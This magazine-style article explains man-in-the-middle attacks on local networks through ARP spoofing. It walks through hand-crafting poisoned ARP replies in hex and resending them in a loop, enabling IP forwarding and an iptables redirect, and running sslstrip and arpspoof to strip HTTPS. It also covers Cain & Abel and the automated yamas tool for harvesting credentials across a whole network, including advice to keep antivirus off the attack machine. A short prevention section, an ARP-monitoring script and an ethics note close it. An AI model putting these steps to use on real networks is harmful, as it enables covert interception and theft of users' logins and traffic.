
Overview
In the hakin9.org May release, I wrote about a number of ways of performing MITM attacks and how to steal information from an SSL channel. Read on for the content and enjoy the journey.
Dangers of Man in the middle attacks to modern life
In modern times we are all exposed through the use of computers, smart phones or any other device, all of them connected in one consolidated network. When we use the word network, it means that we can communicate with another party by sending information through cables or even through the air.
Introduction
Man in the middle attacks allow those with evil intent to gather information without the knowledge of either communicating party. If done properly, there is little to no sign of the attack, and because of that fact, additional weaknesses are exposed (think recovered usernames and passwords).
But of course, in order for those communications to be transmitted over the network between different equipment, there must be a standard or a certain framework. This model, known as the Open Systems Interconnection (OSI) model, is a reference model developed by ISO (International Organization for Standardization) in 1984.
The Open Systems Interconnection (OSI) model describes a communication process that has been divided into 7 layers; it splits the tasks involved in moving information between networked computers into seven smaller, more manageable task groups.
In a nutshell, layers 7 through 4 deal with end-to-end communications between data source and destination. Layers 3 to 1 deal with communications between network devices.
Explanation of the 7 OSI layers in short
Layer 1: Physical
The physical layer defines the cable or physical medium itself.
Layer 2: Data Link
The data link layer defines the format of data on the network. A network data frame, also known as a packet, includes a checksum, source and destination addresses, and data such as the MAC address.
Layer 3: Network
IP is responsible for routing, directing datagrams from one network to another.
Layer 4: Transport
The Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) sit at the transport layer.
Layer 5: Session
The session protocol defines the format of the data sent over the connections and has a mechanism for opening, closing and managing a session between end-user application processes.
Layer 6: Presentation
The presentation layer uses a canonical form with a standard byte ordering and structure packing convention, independent of the host, and delivers formatted information to the application layer for further processing or display.
Layer 7: Application
The applications running on the server, such as HTTP, email and so on.
Why should we care?
At the beginning we talked about espionage and now we talk about the 7 OSI layers; what does that have to do with the risk? From my point of view there is another layer, layer 8, which reflects back to the end users. Layer 8 does not exist in the OSI model, but in my opinion it should be part of it. Without any user interaction, in some cases, how should we expect the data to be transmitted at all?
Humans are always the bottleneck in the security arena, because humans make mistakes, and this is where the problem is. Let me give you an example: if you are working in a corporate organization, I am pretty sure you are well protected in a very secure network environment. But do you think there is a chance that these users will use their laptop to access the internet on another, public network, such as in an airport or an internet café? The likelihood may be low, but do you think it could happen?
What is a MAC address?
The Address Resolution Protocol (ARP) is a network layer protocol used to convert an IP address into a physical address, which has the format MM:MM:MM:SS:SS:SS. This address is unique to each piece of computer hardware. It consists of 12 hexadecimal digits and is 48 bits in length. The first half of the address represents the adapter manufacturer. For example, in 00:A0:C9:11:22:33 the prefix 00:A0:C9 indicates that the manufacturer is Intel Corporation.
What brought my interest to this area was the security issue you face when running in a flat LAN environment. I will explain this in detail in this article. Let us get started with how Microsoft assigns the MAC address pool when Hyper-V is installed. The MAC address is divided into 2 parts: the first part is the manufacturer prefix I explained earlier, and the second part is derived by Microsoft. You can look at the detail in figure 1.
00:15:5D:1A:2B:00
The first portion (00:15:5D) is the Microsoft OEM prefix, but have you ever thought about where the second portion (1A:2B) comes from? Let me explain. Say the IP address of the Hyper-V host is 10.208.26.43; take the second half of the address, 26.43, convert it from decimal to hex, and you get 1A:2B.
So each time you deploy a Hyper-V host, the MAC address pool will not be duplicated. The range of the MAC address pool will look like the one below (FF converted from hex to decimal is 255):
00:15:5D:1A:2B:00 to 00:15:5D:1A:2B:FF
Figure 1: registry location showing the MAC address pool
Where is the risk? I don't get it
This is where the challenge comes into the picture: now that perpetrators are getting smarter day by day using the free tools available on the internet, they can launch a Man in the Middle attack, also known as MITM.
What it really does is impersonate someone in the network and become the middle man transmitting information from the source to the destination. Used this way, it can also become a denial of service. I will explain in more detail as we go along with the technical how-to.
Principle of ARP Spoofing
To summarize, ARP spoofing can serve as a man in the middle attack or as a DDoS attack, since it can inject a non-existent MAC address into the network. The diagram below will give you some idea of it.
To give you more understanding of the packets, I decided to capture the information in my lab; it consists of different steps and stages.
Man In The Middle the hard way
Stage 1: Collecting packet information
1) The tool we use in this lab is Wireshark; you can download it from the Wireshark Download Page.
2) After you have performed the installation, run Wireshark as in figure 2.
Figure 2: Running Wireshark
3) Configure the interface for capturing packets as in figure 3.
Figure 3: Configure interface
4) As shown on screen, you will need to check "Capture packets in promiscuous mode", which means sniffing mode.
Figure 4: Capture packets in promiscuous mode
5) After you have completed all the settings, click the start button and you will see some packets being captured.
6) You should be getting some packets as below; these are our interest for the next step, as in figure 5.
Figure 5: Result of info collection
Stage 2: Analysis of the packet
1. This is a sample of the correct content of the file.
2. Export the selected packet to /tmp/script/arp
3. Edit the file by typing this command: hexedit -b /tmp/script/arp
Info | Remark
Destination | 00 50 56 F4 78 89 (GW) @ 192.168.18.2
Target IP address | C0 A8 12 02 (GW) @ 192.168.18.2
Source | 00 0C 29 F1 EF DB (Hacker) @ 192.168.18.139
Sender IP | C0 A8 12 8B (Hacker) @ 192.168.18.139
Victim | 00 0C 29 13 80 DD @ 192.168.18.130
Victim IP | C0 A8 12 82 @ 192.168.18.130
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Stage 3: Modify packet
1. Start modifying the victim packet
2. hexedit -b arp-victim
3. Replace the hacker MAC address with the victim MAC address
4. Replace the gateway MAC address with the hacker MAC address
Before changing the packet
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
5. Save the file as arp-victim and send the file to the victim
6. file2cable -v -i eth0 -f arp-victim
Summary of what has been modified
Dest MAC | Source MAC | Type | ARP header | Sender MAC | Sender IP | Target MAC | Target IP | Padding
Before the packet was modified:
Hacker Mac | Gateway Mac | X | X | Gateway Mac | Gateway IP address | Hacker Mac | Hacker IP | x
After the packet was modified:
Victim Mac | Hacker Mac | x | x | Hacker Mac | Gateway IP address | Victim Mac | Victim IP address | x
Stage 4: Modify gateway packet
1. cp arp-victim arp-gateway
2. hexedit -b arp-gateway
Before changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After changing the packet
00000000 00 50 56 F4 78 89 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 82 .......PV.x.....
00000020 00 50 56 F4 78 89 C0 A8 12 02 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Stage 5: Enable IP forwarding
1. As explained earlier, if this step in stage 5 is not configured, the attack up to stage 4 will simply be a denial of service. But of course you do not want that to happen, because your intention is to collect information.
2. What you need to do next is enable IP forwarding on the BackTrack machine itself. In layman's terms, it means enabling the routing function on the machine so that the packets can be forwarded.
echo 1 > /proc/sys/net/ipv4/ip_forward
nano doarp.sh
chmod 700 doarp.sh
#!/bin/bash
# Resend both crafted ARP replies every 2 seconds so the poisoned cache entries do not expire
while [ 1 ]; do
    file2cable -i eth0 -f arp-victim
    file2cable -i eth0 -f arp-gateway
    sleep 2
done
Summary of what has been modified
Dest MAC | Source MAC | Type | ARP header | Sender MAC | Sender IP | Target MAC | Target IP | Padding
Before the packet was modified:
Victim Mac | Hacker Mac | x | x | Hacker Mac | Gateway IP address | Victim Mac | Victim IP | x
After the packet was modified:
Gateway Mac | Hacker Mac | x | x | Hacker Mac | Victim IP address | Gateway Mac | Gateway IP | x
Stage 6: Wait & monitor
This is the last step; what you need to do is monitor your Wireshark and look for any potential login ID with password. But if the users are using an encrypted channel, you will not be able to see the content.
Man In The Middle new trend
After you have looked at the hard way of doing MITM, do you think you would use it? The effort to do it is quite a lot, and mistakes can happen. The chances of success might be low. The reality is, this is how people did it a long time ago.
Practically no one will do it the hard way, but it is good to understand in depth how ARP spoofing really works. The easy way I will mention here comes in 2 types: one is more toward Windows environments and the other toward Linux environments. I will pick the most common targets that a perpetrator would go after in order to get the information they want, and from there you can explore the details further.
Building a MITM attacker machine on Windows
I think most users are on Windows, and they are more comfortable using Windows as the machine to perform an attack. To build such a machine there are certain things that you must know. The first is: do not install any antivirus on this machine, as the antivirus will remove the tools. Second, do not use that machine to surf the internet, to avoid any potential viruses on the machine. The third comment concerns which OS is the preferred option: most of the software runs pretty well on Windows XP, and that is what is recommended.
But you must take note as well that this OS is soon going to reach end of life.
Since we are just focusing on the man in the middle attack, the favourite tool to use is Cain & Abel. If you read the Bible, you will notice the name comes from the two sons of Adam and Eve. But today I am not asking you to read the Bible; I am going to explain the tool.
The tool was developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else who plans to use it for ethical reasons. But much of the time, the tool has been used for crime.
The tool can do a lot of damage, including the following:
1. WEP cracking
2. Speeding up packet capture by wireless packet injection
3. Ability to record VoIP conversations
4. Decoding scrambled passwords
5. Calculating hashes
6. Traceroute
7. Revealing password boxes
8. Uncovering cached passwords
9. Dumping protected storage passwords
10. ARP spoofing
11. IP to MAC address resolver
12. Network password sniffer
Let's get started
As shown in figure 6, this is how Cain & Abel looks; the GUI is user friendly and you can get all the information required in just a few clicks.
Figure 6: Cain & Abel
The first thing you must do is identify your IP address by typing ipconfig /all in your command prompt.
The next step is to click on the icon to activate Cain & Abel, click ARP, start sniffing, go to the sniffing tab, and scan the MAC addresses on the entire network.
Wait until the sniffing process is complete, click the ARP tab at the bottom, then click the "+" sign. A new window will pop up consisting of two columns: click the IP of the server in the left column and click the IP address of the victim on the right, and repeat this against all targets. In most cases we will target all, as we do not know which machine belongs to whom. Remember, do not run this on your production environment, as it could do a lot of damage.
What happens in the background is that the tool starts running a poisoning attack against the victim IP address. If during that time the users are surfing the internet via HTTP or anything else, you will be able to see it on the password tab. I am not against this tool, but if the user is visiting an HTTPS website, the user will get a prompt asking whether they want to continue to the website. The chances of the user clicking continue are high, but then again, I believe we could do better. The tool also generates a certificate on behalf of the real origin website, so why does the user still get a prompt? This is because the certificate has a different thumbprint. If in your corporate organization you are using some sort of proxy with a certificate and you have trusted the proxy certificate, that means your user ID could have been captured. So take note of this too.
Building a MITM attacker machine on Linux
The approach is almost the same as for Windows, but of course on Linux you should expect more text than GUI. There are 2 approaches we can take here: the first approach is semi-automatic and the second is fully automatic.
With the first approach you still need to do some manual work, such as configuring the machine to route the traffic, some firewall rules and reading the logs. I will explain why this is not a good approach as we go into detail.
To enable the routing function we must change a value in /proc as below:
echo 1 > /proc/sys/net/ipv4/ip_forward
The next step is to configure all incoming requests to be diverted; you can use any destination port that you like:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 12345
Now this is where the real work starts: you will need to use the terminal and cd to /pentest/web/sslstrip, as we need to run a Python script from there.
To view all the available options of the command you can type the following:
python sslstrip.py --help
Options:
-w Specify file to log to
-p Log only SSL POSTs
-S Log all SSL and HTTP traffic to and from server
-l Port to listen on
-f Substitute a lock favicon
-k Kill sessions in progress
-h Print help message
To start the tool, you need to run the command below:
python sslstrip.py -l 12345
Now we need to start the MITM process. You may have noticed that the process is getting simpler and easier: from the manual way of changing the bytes we have come to a command that does the spoofing for us.
arpspoof -i eth0 -t Victim_IP Gateway_IP
Once the client starts surfing the internet, all the logs will be captured in sslstrip.log. You can view the changes in real time using the tail command as shown below:
tail -f sslstrip.log
In reality, this will work in a smaller environment; if too many users are visiting websites, you might want to use other commands such as grep or print to capture the information that you would like to see.
What would be the next evolution?
As you have read in the different steps, whether the manual way, on Windows machines or on Linux, do you notice that the tools are getting smarter as time goes on? The steps I want to show here are fully automated, thanks to the developer who created this tool. Then again, from the security standpoint, you cannot differentiate what is real and fake anymore, and cybercrime would be expected to increase.
The tool is known as yamas and is available for download from comax.fr/yamas.php. Yamas is a tool that aims at facilitating man in the middle attacks by automating the whole process, from setting up IP forwarding and modifying iptables to the ARP cache poisoning (using either ettercap or arpspoof). The traffic is stripped of SSL with the famous sslstrip 0.9.
What you need to do is just run the command yamas and wait for the result. When you first run the command, it will ask where the traffic should be diverted to, as shown below. Select the default and press enter.
what port should the traffic be redirect to? (Default = 8080)
The second screen you will see asks you to enter the gateway IP; by default it will automatically detect the range for you. Press enter to proceed.
Enter Ip gateway address or press enter to use x.x.x.x
After that you will be prompted to select the interface. Press enter to use the default value.
what interface would you like to use . It should match IP gateway as shown above
By default we will target the entire network, so just press enter.
We will target the whole network as default, press 0 for manual
What is left here is just to wait, and all the credentials will be populated on your screen.
Prevention
As you have read through all the steps, it might look difficult to protect against a layer 2 attack. But some vendor products do provide protection against the attack, such as Cisco's, which they call Dynamic ARP Inspection. You must be aware that not all locations can afford to have prevention devices in place, such as public networks. This is why security awareness should be in place to guide users on what they are allowed to do when they are on a public network. There is no such thing as a patch for humans; they need to be educated.
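As an added example, not code from the article, the following Python decodes the article's own ARP frames from the Stage 2, 3 and 4 hex dumps and applies the arpwatch-style check that a host or a monitoring sensor can run where Dynamic ARP Inspection is not available: it records each IP-to-MAC binding learned from ARP replies and alerts when an IP is later claimed by a different MAC. The decoder layout (struct formats), the function names and the seeded table of known bindings are this example's own assumptions.

```python
"""Added example: decode the article's ARP frames and flag IP-to-MAC rebinding.
The three frames are the article's bytes; the seeded "known" table and the
alert wording are constructed for this demo."""
import struct

ETHERTYPE_ARP = 0x0806

def mac_str(b):
    return ":".join(f"{x:02X}" for x in b)

def ip_str(b):
    return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Decode an Ethernet frame carrying an IPv4-over-Ethernet ARP packet (RFC 826)."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame: ethertype 0x{ethertype:04X}")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol combination")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_dst": mac_str(dst), "eth_src": mac_str(src),
        "op": {1: "request", 2: "reply"}.get(op, f"op{op}"),
        "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
        "target_mac": mac_str(tha), "target_ip": ip_str(tpa),
    }

def check_bindings(frames, known=None):
    """Return alert strings for ARP replies that rebind an IP already seen with another MAC."""
    learned = dict(known or {})
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if arp["op"] != "reply":
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in learned and learned[ip] != mac:
            alerts.append(f"{ip} moved from {learned[ip]} to {mac} (frame from {arp['eth_src']})")
        elif arp["eth_src"] != mac:
            # A reply whose Ethernet source disagrees with its ARP sender is also suspicious.
            alerts.append(f"{ip}: ethernet src {arp['eth_src']} != ARP sender {mac}")
        learned.setdefault(ip, mac)  # first binding seen wins, as in arpwatch
    return alerts

# Article frames: gateway's genuine reply to the attacker (Stage 2), the reply
# crafted for the victim (Stage 3) and the reply crafted for the gateway (Stage 4).
PAD = bytes(18)
GW_REPLY_TO_HACKER = bytes.fromhex(
    "000C29F1EFDB 005056F47889 0806 0001 0800 06 04 0002"
    "005056F47889 C0A81202 000C29F1EFDB C0A8128B") + PAD
SPOOF_TO_VICTIM = bytes.fromhex(
    "000C291380DD 000C29F1EFDB 0806 0001 0800 06 04 0002"
    "000C29F1EFDB C0A81202 000C291380DD C0A81282") + PAD
SPOOF_TO_GATEWAY = bytes.fromhex(
    "005056F47889 000C29F1EFDB 0806 0001 0800 06 04 0002"
    "000C29F1EFDB C0A81282 005056F47889 C0A81202") + PAD

if __name__ == "__main__":
    known = {"192.168.18.130": "00:0C:29:13:80:DD"}  # constructed: victim's real MAC
    for f in (GW_REPLY_TO_HACKER, SPOOF_TO_VICTIM, SPOOF_TO_GATEWAY):
        print(parse_arp(f))
    for alert in check_bindings([GW_REPLY_TO_HACKER, SPOOF_TO_VICTIM, SPOOF_TO_GATEWAY], known):
        print("ALERT:", alert)
```

Run against the three frames, the monitor reports the gateway IP moving to the attacker's MAC and, with the victim's real MAC seeded, the victim IP moving as well; a genuine reply alone produces no alert.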
Note on ethics
Our intention when we started writing these articles was to give an overview of what tools exist on the market and how we can use them to secure our organization against unidentified threats. When you start to use the tools above, please make sure you keep this with you:
1. Do not use this for any malicious intention
2. Do not attack any organization without approval from top management
3. Think of the damage that you might cause
Conclusion
In this article we have presented how to perform a man in the middle attack on Linux as well as on Windows machines. We have shown the trick of hiding in the network while performing intelligent information gathering. The author also shows a common attack, commonly done by attackers, and how fast they could obtain information in a stealthy way. As you can see, the growth of the tools can help anyone become a security pen tester, while if they are used by the wrong hands they could bring more damage than good. Such an attack is much easier to perform and more likely to succeed. The author sincerely hopes that these short articles can increase the awareness of anyone who is handling computer or security services. In the broader sense, we hope that the information can help you to increase the security of your organization's assets.
Summary
Stay tuned for my next articles. Let us know what you thought, learned and hope for in the next articles! Connect with us on Google+, Twitter and Facebook.